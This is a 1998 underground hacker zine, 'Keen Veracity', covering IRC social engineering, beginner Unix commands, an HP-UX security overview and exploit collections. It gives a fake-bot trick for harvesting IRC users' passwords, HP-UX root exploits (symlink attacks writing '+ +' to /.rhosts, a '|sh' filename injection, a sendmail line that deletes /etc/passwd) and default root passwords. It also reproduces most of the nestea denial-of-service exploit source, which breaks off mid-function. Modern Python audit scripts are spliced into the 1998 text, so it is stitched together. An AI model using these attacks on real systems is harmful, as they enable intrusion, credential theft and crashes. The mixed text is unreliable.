=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                 *-*  K e e n   V e r a c i t y  *-*
             *-*  Volume One (rev. 2) - April 1998  *-*
               *-*  L e g i o n s   o f   t h e  *-*
                   *-*  U n d e r g r o u n d  *-*
                   *-*  http://www.legions.org  *-*
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

C o n t e n t s:   /Z1#P10.01/

o-NEWS-o
  * About                                - optiklenz
  * Beach Con                            - sync
  * Phreak Zine                          - optiklenz
  * This Month's Linkage                 - LegionPhreak

o-IRC-o
  * Irc Social Engineering (revisited)   - optiklenz
  * Legions Script (BitchX)              - HyperLogik

o-Neophytes-o
  * Basic Unix Commands                  - optiklenz
  * Exploits?                            - miah

o-Security-o
  * HPUX Security Overview (revised)     - tip
  * HPUX Exploits Note (bugs)            - optiklenz
  * Nestea Exploit (advisory)            - Dallion
  * Infoseek (exploit)                   - optiklenz
  * Fake Mail (revised)                  - optiklenz
  * Wingate Exertion                     - optiklenz
  * backdoor.c                           - jsbach
  * IP Spoofing                          - optiklenz
  * Anal Sniff                           - chron1c
  * Back Attack                          - chrak
  * Irix LMR                             - optiklenz
  * Securing Linux                       - BlackIC
  * FoolProof                            - Duncan Silver

o-Misc-o
  * pnp56K Linux Setup                   - mosoka
  * Sniffer Log                          - chrak

o-Comic Relief-o
  * Young Hackers, and Jail              - Analyzer
----------------------------------------------------------------------

- { = - = N E W S = - = } -

[ABOUT]-----------------------------------------------------| optiklenz |

This zine covers different aspects of computing. This month's security
focus is concentrated on the HP-UX platform. This month's guest editor is
Analyzer. Guest editors, along with the topic the editor is writing on,
will change monthly.

Most of our articles and zines for the past 6 years have been distributed
through bulletin board services, our own Electronic Source and Abyss BBS
just to name a couple. This is actually our first zine release being
distro'd via the web. We release a new zine every month. If you would like
to submit an article for the next zine, send email to:
webmaster@legions.org with the subject matter of the article. Also if
there is a certain subject you'd like to see written about in the next
zine, please let us know.

(1)------------NEWS------------------------------------------------(1)

[Beach Con]------------------------------------------------------| sync |

Last year's Legion Con's (Cyber Con) theme was "Network Utilization." This
year, there will be a multitude of themes which will range from mainstream
security and cryptology, to telephony and other types of electronic
manipulation.

(2)------------NEWS------------------------------------------------(2)

[Phreak Zine]-----------------------------------------------| optiklenz |

We are currently working on our Phreak zine. There is progress, but
production is going extremely slow, being that members are currently
occupied with their own activities. An example of some of the zine's
content is listed below.

  [o] Shadowing your ANI
  [o] Detailing, and using a beige box
  [o] ATT-CONF
  [o] Phone Tapping
  [o] Discreet frequencies
  [o] Telenet #'s
  [o] More...

Want to submit an article? Mail webmaster@legions.org with the article
title first.
We will either "ok" it or decline it depending on your article content, or
if someone has already chosen the same subject matter.

(3)------------NEWS------------------------------------------------(3)

[Linkage]------------------------------------------------| LegionPhreak |

This Month's Linkage:

  They Finally Have a Static Layout     - http://www.hackers.com
  A UDDF.NET Production (www.uddf.net)  - http://www.hackedsites.com
  Exploits Galore                       - http://www.rootshell.com
  Beat Your Meat (It's Good for You)    - http://www.freshmeat.net
  Rhino9                                - http://www.rhino9.com
  Unix Guru                             - http://www.ugu.com/

Link of the month: http://www.legions.org

(4)------------NEWS------------------------------------------------(4)

- { = - = I R C = - = } -

[Social Engineering]----------------------------------------| optiklenz |

Gaining users' passwords via irc

Method 1.

First, you need two irc clients open. This method is more authentic if you
have operator status in the channel. On one of the open clients, name
yourself Bot, or something to that effect, and on the other client use
your regular nick. If someone is looking to get op's let them know that
there is a Bot in the channel, and if the user/users want ops they must
first identify themselves with the Bot using the '/msg Bot identify
password' command. After you tell them this and leave the room either way
the passwd's will come rolling in. It's less suspicious if you leave
though, because people will think damage can't be done if you're not there
to do it. On the antithesis you are still there because you are the Bot
just sitting there collecting passwd's. These passwd's are maybe for their
email account, website, and other things. So go back later and ask the
people that fell for it if they have a website, or for their email
address, etc, etc.

(5)------------IRC-------------------------------------------------(5)

[Legions Script]-------------------------------------------| Hyperlogik |

Legions script for Linux is due out in a few weeks.
More info will be posted in the next zine.

(6)------------IRC-------------------------------------------------(6)

- { = - = N E O P H Y T E S = - = } -

Note: The content of the neophytes section will grow more in-depth every
month, escalating from basic to median, and so on...

[Basic Unix Commands]---------------------------------------| optiklenz |

  who is on      shows who is logged on the system
  write name     name equiv to the person you want to chat with
                 (ctrl D exits chat mode)
  EOT            End of Transfer
  du -a          mem check
  ps -pid user   kills a user
  passwd         Change your users passwd
  ls             List all files in a directory (ls -a)
  telnet         start a telnet session
  open           open a location
  ftp            start file transfer session
  find           Find a file
  cd\dir         dir being sub-directory
  netstat        See current processes running among your connection.
  chgrp          Changes a file's group ownership
  cat "file"     type contents; try cat /etc/passwd
  tcpdump        Packet sniffer, monitor packets in promiscuous mode
  rmdir          Deletes one or more directories
  sleep          Causes a process to become inactive for a specified
                 amount of time
  sort           Sort and merge one or more files
  spell          Finds spelling errors in a file
  split          Divides a file
  stty           Displays or sets terminal parameters
  tail           Displays the end of a file
  troff          Outputs formatted output to a typesetter
  tset           Sets other terminal type
  umask          Allows the user to specify a new creation mask
  uucp           Unix-to-Unix copy
  vi             Full screen editor
  wc             Displays details in the file size
  who            Displays information on the system users
  write          Used to send a message to another user
  ifconfig       To see the routing layout/destination of packets, etc.
  gcc            Compile C based code
  rm             delete file
  mv             rename
  bfs            Scans a large file
  cal            Displays a calendar
  mkdir          Create a directory
  chmod          Assign file permissions

TIP: If you have temp access to a system, chmod 777 $home or chmod $email
so you have access to their home directory, as well as their email later.
(7)------------NEOPHYTES-------------------------------------------(7)

[Exploits]-------------------------------------------------------| miah |

A lot of people ask me about exploits, what they are, what they do, and
how they use them. Well, I'm writing this document to explain this for
hopefully my last time. It's just starting to bother me that I have to
explain this every time I'm on irc, so I thought there should be a text
explaining them. Well, here it is.

--- What is an 'exploit'? ---

Well, to explain this simply, an exploit is a program that 'exploits' a
bug in a specific piece of software. All exploits are different; they do
different things, exploit different bugs, etc. That's why exploits are
always program specific. Exploits are made to get root on different
operating systems. They achieve this by exploiting a bug in software when
the software is running as root. In UNIX type OS's, software may have to
run as root (or UID 0) in order to perform a specific task that cannot be
performed as another user. So basically the exploit crashes the software
while running as root to give you the beautiful root prompt. Well, now
that I've answered questions one and two, I'm going to move on to
question 3.

--- How do I use an exploit? ---

Since exploits are coded in C 99% of the time, you need a shell on the box
you are going to use the exploit on, OR you need to be running the same OS
as the box you are attempting to hack. So basically, you need to put the
source code or the binary in your shell account's dir (you want to use a
hacked shell, or a shell that's not yours, for this :) ). To put it on
your shell, you can ftp to your account and upload it that way, or you can
use rz if you are using a dialup shell. Either way, I shouldn't have to
explain those two things too much, it's pretty easy. Once you have the
exploit on the box, you just need to compile it. Usually you would compile
the exploit like so:

  blah:~/$ gcc exploit.c

That should compile your exploit.
However, be aware that some exploit coders are sneaky pests, and like to
pick on people who don't know C, so they will sometimes insert bugs into
the exploit, thus stopping it from being compiled. So it does help to know
C when playing with C. :)

After the compiling is done, you should be able to just run the exploit
and its work will be done when you see the root prompt. However, not all
exploits are the same, and might require different command lines to get
them to work.

--- Where can I get some exploits? ---

Well, two of the best places I have found for exploits are:

  http://get.your.exploits.com and http://www.rootshell.com

(8)------------NEOPHYTES-------------------------------------------(8)

- { = - = S E C U R I T Y = - = } -

[Hpux Security Overview]------------------------------------------| tip |

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                   HP-UX: A Security Overview, Part One
                          revision02   17mar98
                         http://www.legions.org
---------------------------------------------------------------------------

Table of Contents:

  1) Intro and Disclaimer
  2) HP-UX: an Overview
  3) The Setup by Default
  4) HP-UX Security Measures
  5) The Trusted System
  6) Resources
  7) Exploits
  8) To Be Continued

---------------------------------------------------------------------------

1) Intro and Disclaimer

  a) This text is designed to complement general Unix knowledge. All Unix
     OS's are different in their own right. This text will delve into
     HP-UX-specific areas. This is not a Unix tutorial, rather a
     supplement to fundamental Unix hacking knowledge.

  b) This text will cover HP-UX version 10.x primarily. Specifically,
     10.10 and 10.20 will be in mind. 11.0 has been released and I haven't
     gotten to checking it out yet. 9.x is old, and no longer supported by
     HP. Thus, the most logical choice (and most popular version of HP-UX)
     is 10.x.

  c) I'm not perfect; please notify me of any errors in the document.
     Also, if you see anything you want added to this file, feel free to
     send it to me.

  d) This text was written for educational purposes only.

  e) Thanks to HP, rootshell, and the various other hacker folks that have
     helped me write this article. Special thanks to Colonel Panic for
     finding many exploits, some of which I have used as examples. Shouts
     out to my fellow LoU members, the SOD, and the Chicago crew.

---------------------------------------------------------------------------

2) HP-UX: an Overview

Largely based on SysV, Hewlett Packard's version of Unix, HP-UX, has
undergone many changes and many version updates (current version is 11.0).
While robust in many areas (ie, memory management, overall performance,
etc), security leaves much to be desired. HP's vision of Unix seems to
come from that of a closed network with non-malicious users (ie,
/usr/local being world-writeable); only recently has the Internet been an
explosion, and HP seems to be playing "catch up" to network and internal
security.

HP's solution to security problems has been patches. Lots of patches. You
can see the patches on a system by typing "swlist -l product" (substitute
"fileset" instead of "product" for more specific information). Patch and
software information is stored in /var/adm/sw, so you can check out older
pre-patched binaries there. As usual, system logs are kept in /var/adm
(along with btmp, utmp, and wtmp).

---------------------------------------------------------------------------

3) The Setup by Default

By default, HP-UX is VERY insecure. Yes, most Unixes are (by default), but
HP-UX even more so. Here is a brief list of what is insecure by default:

  o /usr/local and subdirectories are world writeable.
  o Many applications by default are installed as world writeable (ie, the
    measureware database module for oracle installs this way).
  o root's umask is set to: 02.
  o cue is installed (see section 7 for the exploit).
  o System is un-"Trusted." See section 5.
  o Direct login as root possible from all ttys (as a result of being
    un-"Trusted").
  o System logging is set pretty minimal (see /etc/syslog.conf); not that
    it matters, as system logging is pretty minimal no matter how you have
    it.
  o /etc/logingroup non-existent. While this is not an insecurity, it's
    worth mentioning.

---------------------------------------------------------------------------

4) HP-UX Security Measures

  o Suid scripts not possible

    This is a popular trend in newer Unix OS's. Basically, if you have a
    suid script, it will not be run as root. Binaries are what's
    important.

  o Dialup passwords

    You can set an additional password for a dialin device. If you dialed
    into an HP-UX server with dialup passwords enabled, you would enter
    your usual login and password, then an _additional_ dialup password.
    Each dialup password is dependent on the shell; the shell is used as
    the "login" field. To explain further, look at /etc/d_passwd:

      /bin/sh:qKrbuYLg9B2vU:0:0:::
      /bin/csh:4LcBNqYbmdp3Y:0:0:::
      /bin/ksh:zKanqUcdEzh3Q:0:0:::

    What's important here are the first two fields (obviously). Two other
    things to note. Firstly, if the system is relatively secure, the
    "login" field can only be eight characters long. This creates a
    problem if your shell is "/usr/local/bin/tcsh" (19 chars). Thus, what's
    done is either: a link is created that is less than eight characters
    (ie, /bin/tsh -> /usr/local/bin/tcsh) or dialup passwords just aren't
    used. Secondly, the file to reference which tty the dialin is located
    on is /etc/dialups:

      /dev/ttyd0p7

    That's it. That's the format of the file.

  o lanscan and ioscan

    Just a side note to the standard commands, ifconfig and netstat.
    lanscan will tell you what interface cards you have on the system,
    which are up or down, etc, etc. ioscan is similar, but covers the
    entire system, ie, hard drives, I/O adapters, memory, etc. Might be
    useful in getting more intimate with your system.
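An added audit script (not from the zine and not HP-UX code) that checks a file tree for the defaults sections 3 and 4 describe: no /tcb (un-Trusted system), world-writable /usr/local (and /var/ppl, noted under the ppl bug later), a setuid cue binary, and /etc/d_passwd shells longer than the eight-character "login" field. The `prefix` argument and the constructed sample tree are assumptions so it can run against a copy of the files rather than the live root.

```python
"""Audit a file tree for the HP-UX 10.x insecure defaults listed above.

Added example: not part of the zine, not HP-UX code.  `prefix` points the
checks at any root, so a copied or constructed tree can be inspected
instead of the live system.
"""
import os
import stat
import tempfile


def _mode(path):
    """Return the st_mode of path, or None if it does not exist."""
    try:
        return os.lstat(path).st_mode
    except OSError:
        return None


def world_writable(path):
    mode = _mode(path)
    return mode is not None and bool(mode & stat.S_IWOTH)


def is_setuid(path):
    mode = _mode(path)
    return mode is not None and bool(mode & stat.S_ISUID)


def long_dialup_shells(d_passwd_path, limit=8):
    """Shells named in /etc/d_passwd whose path exceeds the eight-character
    'login' field described in the article, so the entry cannot be used
    as-is (the article's fix is a short symlink such as /bin/tsh)."""
    shells = []
    try:
        with open(d_passwd_path) as fh:
            for line in fh:
                line = line.strip()
                if line and not line.startswith("#"):
                    shell = line.split(":", 1)[0]
                    if len(shell) > limit:
                        shells.append(shell)
    except OSError:
        pass  # no dialup passwords configured at all
    return shells


def audit_defaults(prefix="/"):
    """Return a list of findings; empty means none of the listed defaults
    were found under prefix."""
    def p(rel):
        return os.path.join(prefix, rel)

    findings = []
    if not os.path.isdir(p("tcb")):
        findings.append("un-Trusted system: no /tcb directory")
    for rel in ("usr/local", "usr/local/bin", "var/ppl"):
        if world_writable(p(rel)):
            findings.append("world-writable /" + rel)
    if is_setuid(p("usr/bin/cue")):
        findings.append("setuid cue installed")
    for shell in long_dialup_shells(p("etc/d_passwd")):
        findings.append("d_passwd shell longer than 8 chars: " + shell)
    return findings


def build_sample_tree():
    """Constructed tree reproducing the defaults the article describes
    (not a real HP-UX install); returns its root directory."""
    root = tempfile.mkdtemp(prefix="hpux-sample-")
    for rel in ("usr/local/bin", "usr/bin", "etc"):
        os.makedirs(os.path.join(root, rel))
    os.chmod(os.path.join(root, "usr/local"), 0o777)   # world writable
    cue = os.path.join(root, "usr/bin/cue")
    open(cue, "w").close()
    os.chmod(cue, 0o4755)                               # setuid bit
    with open(os.path.join(root, "etc/d_passwd"), "w") as fh:
        # first line is the article's; the tcsh line is constructed
        fh.write("/bin/sh:qKrbuYLg9B2vU:0:0:::\n")
        fh.write("/usr/local/bin/tcsh:qKrbuYLg9B2vU:0:0:::\n")
    return root


if __name__ == "__main__":
    for finding in audit_defaults(build_sample_tree()):
        print(finding)
```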
---------------------------------------------------------------------------

5) The Trusted System

What is a "Trusted System"? Check for a /tcb directory. The existence of a
/tcb directory signifies that the system you're on is a "Trusted System."
The conversion to this is done through /usr/sbin/sam by root. Here is what
converting does to a system:

  o Pseudo-shadow password scheme (actually uses a "protected password
    database").
  o A stricter password authentication system.
  o User auditing.
  o Access control lists (acls) [note: only supported under hfs, not vxfs]
    [second note: being phased out].
  o Terminal and time-based access control.

Basically, to put this all together: in the /tcb/files/auth directory,
there are a number of subdirectories by capital and lowercase letters, ie,
"e," "T," and so forth. This is the initial of the login. In that
directory is a file per user. Thus, root's file would be
/tcb/files/auth/r/root. What's in this file? It's basically like a
password entry, with more fields. ie, /tcb/files/auth/r/root:

  root:u_name=root:u_id#0:\
  :u_pwd=Z1Po84UVyBbGE:\
  :u_bootauth:u_auditid#0:\
  :u_auditflag#1:\
  :u_pswduser=root:u_suclog#8895646615:u_lock@:chkent

root's entry in /etc/passwd would then be:

  root:*:0:3:root:/:/sbin

If it isn't obvious, the login and user id of an /etc/passwd entry are
there, along with additional information. The above example has only a few
fields listed.
The full contents of an HP-UX password database file would contain:

  a  login and user id
  b  encrypted password
  c  account owner
  d  single user mode boot flag
  e  audit id and audit flag
  f  minimum time between password change (not in example - u_minchg)
  g  password max length (not in example - u_maxlen)
  h  password expiration time (not in example - u_exp)
  i  password lifetime (not in example - u_life)
  j  time of last password change (not in example - u_usucchg &
     u_unsucchg)
  k  absolute password expiration date (not in example - u_acct_expire)
  l  max time allowed between logins (not in example - u_max_llogin)
  m  max days before expiration when warning will appear (not in example -
     u_pw_expire_warning)
  n  user or system generated password? (not in example - u_pickpw)
  o  type of sys-gen passwords (not in example - u_genpwd)
  p  triviality check on user-gen (not in example - u_restrict)
  q  can pick null password? (not in example - u_nullpw)
  r  userid of last person who changed this password (not in example -
     u_pwchanger)
  s  random # that user must supply (given to him by the admin) when
     password is reset (not in example - u_pwd_admin_num)
  t  can user generate random # for a password? (not in example -
     u_genchars)
  u  can user generate random letters for a password? (not in example -
     u_genletters)
  v  time of day when user can login (not in example - u_tod)
  w  time of last successful login (not in example - u_suclog)
  x  time of last unsuccessful login (not in example - u_unsuclog)
  y  term or remote hosts from last successful and unsuccessful logins
     (not in example - u_suctty & u_unsuctty)
  z  number of unsuccessful logins, this # clears upon a successful login
     (not in example - u_numunsuclog)
  1  max number of login attempts before account is locked (not in example
     - u_maxtries)
  2  account locked flag (not in example - u_lock)

In /tcb/files, in addition to auth, there are two files, devassign and
ttys. devassign contains device access info and ttys contains term access
info.
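An added parser and audit for the protected password database entries described above (not part of the zine and not HP-UX code). It reads the colon-separated, backslash-continued syntax of /tcb/files/auth/<initial>/<login> using the field names the article lists; the root entry is the one printed above, the guest and toor entries are constructed, and the reading of a trailing "@" as "flag cleared" and a bare name as "flag set" (so root's u_lock@ means not locked) is an assumption from the database's termcap-style format.

```python
"""Parse HP-UX Trusted System protected password entries and flag
settings a defender would review.

Added example; not part of the zine and not HP-UX code.  Assumed field
syntax (termcap style):
    name=value   string         name#123   number
    name@        flag cleared   name       flag set
"""

# root's entry exactly as printed in the article
ROOT_ENTRY = r"""root:u_name=root:u_id#0:\
:u_pwd=Z1Po84UVyBbGE:\
:u_bootauth:u_auditid#0:\
:u_auditflag#1:\
:u_pswduser=root:u_suclog#8895646615:u_lock@:chkent"""

# constructed entries for the audit; not from the article
SAMPLE_ENTRIES = [
    ROOT_ENTRY,
    "guest:u_name=guest:u_id#501:u_pwd=:u_nullpw:u_numunsuclog#7:u_lock@:chkent",
    "toor:u_name=toor:u_id#0:u_pwd=Z1Po84UVyBbGE:u_lock:chkent",
]


def parse_tcb_entry(text):
    """Return (login, fields) for one entry.  Backslash-newline continues
    a line, fields are colon separated and "chkent" closes the entry.
    The same syntax is used by the devassign and ttys files."""
    joined = "".join(line.strip() for line in text.splitlines())
    joined = joined.replace("\\", "")
    parts = [p for p in joined.split(":") if p]
    login, fields = parts[0], {}
    for part in parts[1:]:
        if part == "chkent":
            break
        if "=" in part:
            name, value = part.split("=", 1)
            fields[name] = value
        elif "#" in part:
            name, value = part.split("#", 1)
            fields[name] = int(value)
        elif part.endswith("@"):
            fields[part[:-1]] = False
        else:
            fields[part] = True
    return login, fields


def audit_entry(login, fields, max_failed=5):
    """Findings for one account: usable accounts with an empty password,
    null passwords permitted, many failed logins, and extra uid 0 logins."""
    findings = []
    if not fields.get("u_lock", False):        # u_lock@ or absent: usable
        if not fields.get("u_pwd"):
            findings.append("unlocked account with empty password")
        if fields.get("u_nullpw"):
            findings.append("null password permitted")
        failed = fields.get("u_numunsuclog", 0)
        if failed >= max_failed:
            findings.append("%d failed logins since last success" % failed)
    if fields.get("u_id") == 0 and login != "root":
        findings.append("uid 0 account other than root")
    return findings


def audit_all(entries=SAMPLE_ENTRIES):
    """Map each login to its list of findings."""
    report = {}
    for entry in entries:
        login, fields = parse_tcb_entry(entry)
        report[login] = audit_entry(login, fields)
    return report


if __name__ == "__main__":
    for login, findings in audit_all().items():
        print(login, findings or ["ok"])
```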
Here are a few lines from devassign:

  console:v_devs=/dev/console:v_type=terminal:chkent:
  ttyp0:v_devs=/dev/ttyp0:v_type=terminal:chkent:
  ttyp1:v_devs=/dev/ttyp1:v_type=terminal:chkent:

The format of this file contains:

  a  device name
  b  aliases to that device
  c  device type supported (ie, printer, terminal, tape, or remote)
  d  users permitted on that device; if not specified, all users may use
     it

Here are a few lines from ttys:

  console:t_devname=console:t_maxtries#777:chkent:
  tty:t_devname=tty:chkent:
  tty00:t_devname=tty00:chkent:

The above example only has a few fields listed. The full format of this
file contains:

  a  device name
  b  last user (id) to log into that tty (not in example - t_uid)
  c  last successful login time (not in example - t_logtime)
  d  last unsuccessful login time (not in example - t_unsuctime)
  e  number of consecutive logins before tty is locked
  f  terminal lock flag

In all actuality, not many HP-UX systems are set up to be Trusted.
Managing a password database and tweaking it is more work than necessary.
In addition, remote commands are not possible on a Trusted System, unless
it is done _from_ a Trusted System. Lastly, mapping files to sync
/etc/passwd with /tcb/files/auth are contained in /tcb/files/auth/system.
These are called pw_id_map, gr_id_map, and aid_id_map. It is very likely
that these mapping files will get out of sync with the database files. The
solution is removing them and letting them regenerate. However, all in
all, having a Trusted System can prove to take as much maintenance as an
un-Trusted System. It's really the admin's call. I've seen maybe about
half and half these days.

---------------------------------------------------------------------------

6) Resources

  o If you have a question about a patch, check out
    ftp://us-support.external.hp.com. All the current patches are
    available there for your perusal.
  o http://www.rootshell.com, http://get.your.exploits.org, http://www.hha.
net/hha/exploits, http://www.dhp.com/~fyodor/sploits_hpux.html: Very good sites with Unix and HP-UX-specific exploits. Both explanations and source code/scripts are available here. o Usenet: comp.os.security.announce and comp.sys.hp.hpux: Sometimes regular updates of weaknesses. Avoid alt.2600 at all costs. o And of course, the ever-so-handy man command. --------------------------------------------------------------------------- 7) Exploits These are only a few of many. I only added a few, as I wanted to explain about HP-UX security in general. Part 2 will delve deeper into exploits (as well as auditing, system calls, and acls). o cue bug The first thing after gaining access to an HP-UX system is to check if cue exists (typically in /usr/bin/cue). Make sure it's an suid binary (which it is by default). Simply set your umask to 000. Now start cue. In your home directory, do an ll. You'll see that the name of the file created by cue (in my case, it's called "IDMERROR.ttyp1") is owned by root. You'll also see that the umask follows and is world-writeable. Now exit cue. Remove the *ERROR* file created by cue. Think of a file like /etc/passwd or /.rhosts. Do an "ln -s /etc/passwd ~/IDMERROR.ttyp1" (or whatever suits your needs). Now start cue again. Exit it. You'll see that the root owned file that wasn't writeable by anyone not only is now truncated, but it has world write permission. Do whatever you want with it. o ftp mget bug This won't do you much good if ftp isn't suid root (most likely it won't be), but this still works (not as root though). In /tmp, create a separate directory (we'll use "test"). cd to that directory and execute this command: echo "date > /tmp/BLAH" > "|sh". Notice that /tmp/BLAH does not exist. Now, ftp to localhost. cd to /tmp/test and do a "mget *". ftp that file. Now quit ftp and check for a /tmp/BLAH. It exists! cat it. 
Now what if ftp was suid root, and the echo command you used to create "|sh" was this: echo "chmod 777 /etc/passwd" > "|sh"? o Old SAM bug Typically, when SAM (System Administration Manager) is being run by an admin, a temp file is created in /var/tmp. Newer, patched SAMs use arbitrary file names, ie OBAMDBAa01687 or aaaa01990, etc. But older SAMs used a consistent file name when writing this temp file. It was called: outdata. Since SAM is typically run as root, you'll see what I'm getting at here (duh, the temp file is owned by root). Simply create a link to a file, such as /etc/passwd to that temp file (ie, ln -s /etc/passwd /var /tmp/outdata). Now if root's umask is set to 000, then you'll own /etc /passwd next time the admin runs SAM. This trick is unlikely these days, as most SAMs are patched and most admins don't use umask 000 on root. o Old SAM bug 2 On older versions of SAM, a user named sam_exec was created with uid 0. The default password for this on 10.x is: x7vpa5jh Simply login as sam_exec, and hit control-c right away for a shell. o ppl bug Another symbolic link exploit. ppl's log file is: /var/ppl/log. Now, you can simply remove or move this (so that /var/ppl/log is non-existent; also /var/ppl is world-writeable on default, thus you can do this). This log file is owned by root (ppl is an suid program). Next, think of a file that you'd like to nuke and own (if you don't want to get caught, try /.rhosts instead of something like /etc/passwd; in addition, save the old /var/ppl/log somewhere to put back when you're done). Now do a: ln -s /.rhosts /var/ppl/log. Then type: ppl -o '\ + + ' or whatever you want to place in /.rhosts. You get the drift. Now you can remove /var/ppl/log and put the old one back in place. You can now rlogin as root. o Educational Centers HP's educational centers are protected mainly by firewalls. But if you happen to get in, the root password on nearly all machines is simply: hp. 
---------------------------------------------------------------------------

8) To Be Continued

Part Two will delve deeper into the Trusted System, specifically covering
auditing and acls. Exploits will also be covered in greater detail.

---------------------------------------------------------------------------
(c) 1998 tip of Legions of the Underground
http://www.legions.org
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

(9)------------SECURITY--------------------------------------------(9)

[Hpux Exploits Note]----------------------------------------| optiklenz |

  HP_UX versions 1.2&13.1  sm, -oQ ==> can read/write any file
  5.57                     from:<"|/bin/rm /etc/passwd"> && bounce mail....
  HPUX <7.0           1--  chfn -- allows newlines, etc ()
  HP-UX               1--  sendmail: mail directly to programs ()
  HPUX A.09.01        1--  sendmail: mail directly to programs ()

1) libXt: This is a widely known security hole that allows local users to
   gain root access via setuid X programs like xterm or xload. A
   recommendation is to replace the guilty libraries by applying X/Motif
   "jumbo" patches, which is a good thing anyway.

2) sendmail: Yet another sendmail hole. The best solution at CERN is maybe
   to use the public domain version of sendmail (used by default on all
   HP-UX 10.20 systems) that does not seem vulnerable.

(10)-----------SECURITY-------------------------------------------(10)

[Nestea Exploit]----------------------------------------------| Dallion |

---------------------------------------------------------
Note: Nestea by humble
Code ripped from teardrop by route
---------------------------------------------------------

Basically crashes a machine using "off by one" IP headers. Like boink and
land reversed. It's a total rip (the code that is) but it works, none the
less. I have tested it on machines running Linux kernels 2.0.33 and
2.1.95; both machines went slamming down when I hit them. I like this toy.
:) To fix it: 1) If you do packet filtering, set it to filter off by one IP headers 2) Fix your kernel to not process these packets. - Dallion Dalson Here is the exploit: 01. nestea.c - exploits the "off by one IP header" bug in Linux // nestea.c by humble of rhino9 4/16/98 // This exploits the "off by one IP header" bug in the Linux IP frag code. // Crashes Linux 2.0.* and 2.1.* and some Windows boxes // this code is a total rip of teardrop - it's messy #include #include #include #include #include #include #include #include #include #include #include // bsd usage is currently broken because of socket options on the third sendto #ifdef STRANGE_BSD_BYTE_ORDERING_THING /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */ #define FIX(n) (n) #else /* OpenBSD 2.1, all Linux */ #define FIX(n) htons(n) #endif /* STRANGE_BSD_BYTE_ORDERING_THING */ #define IP_MF 0x2000 /* More IP fragment en route */ #define IPH 0x14 /* IP header size */ #define UDPH 0x8 /* UDP header size */ #define MAGIC2 108 #define PADDING 256 /* datagram frame padding for first packet */ #define COUNT 500 /* we are overwriting a small number of bytes we shouldnt have access to in the kernel. 
to be safe, we should hit them till they die :> */ void usage(u_char *); u_long name_resolve(u_char *); u_short in_cksum(u_short *, int); void send_frags(int, u_long, u_long, u_short, u_short); int main(int argc, char **argv) { int one = 1, count = 0, i, rip_sock; u_long src_ip = 0, dst_ip = 0; u_short src_prt = 0, dst_prt = 0; struct in_addr addr; if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("raw socket"); exit(1); } if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one)) < 0) { perror("IP_HDRINCL"); exit(1); } if (argc < 3) usage(argv[0]); if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2]))) { fprintf(stderr, "What the hell kind of IP address is that?\n"); exit(1); } while ((i = getopt(argc, argv, "s:t:n:")) != EOF) { switch (i) { case 's': /* source port (should be emphemeral) */ src_prt = (u_short)atoi(optarg); break; case 't': /* dest port (DNS, anyone?) */ dst_prt = (u_short)atoi(optarg); break; case 'n': /* number to send */ count = atoi(optarg); break; default : usage(argv[0]); break; /* NOTREACHED */ } } srandom((unsigned)(time((time_t)0))); if (!src_prt) src_prt = (random() % 0xffff); if (!dst_prt) dst_prt = (random() % 0xffff); if (!count) count = COUNT; fprintf(stderr, "Nestea by humble\nCode ripped from teardrop by route / daemon9\n"); fprintf(stderr, "Death on flaxen wings (yet again):\n"); addr.s_addr = src_ip; fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt); addr.s_addr = dst_ip; fprintf(stderr, " To: %15s.%5d\n", inet_ntoa(addr), dst_prt); fprintf(stderr, " Amt: %5d\n", count); fprintf(stderr, "[ "); for (i = 0; i < count; i++) { send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt); fprintf(stderr, "b00m "); usleep(500); } fprintf(stderr, "]\n"); return (0); } void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt, u_short dst_prt) { int i; u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */ u_char byte; /* a byte */ struct sockaddr_in sin; 
    /* socket protocol structure */
    sin.sin_family      = AF_INET;
    sin.sin_port        = src_prt;
    sin.sin_addr.s_addr = dst_ip;

    packet = (u_char *)malloc(IPH + UDPH + PADDING+40);
    p_ptr  = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

    /* first fragment */
    byte = 0x45;                                  /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                                   /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + 10);   /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);             /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) |= FIX(IP_MF);            /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;                   /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                                   /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;                  /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;                  /* IP destination address */
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt);         /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);         /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + 10);          /* UDP total length */

    if (sendto(sock, packet, IPH + UDPH + 10, 0, (struct sockaddr *)&sin,
               sizeof(struct sockaddr)) == -1) {
        perror("\nsendto");
        free(packet);
        exit(1);
    }

    /* second fragment */
    p_ptr = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

    byte = 0x45;                                  /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                                   /* IP TOS (skipped) */
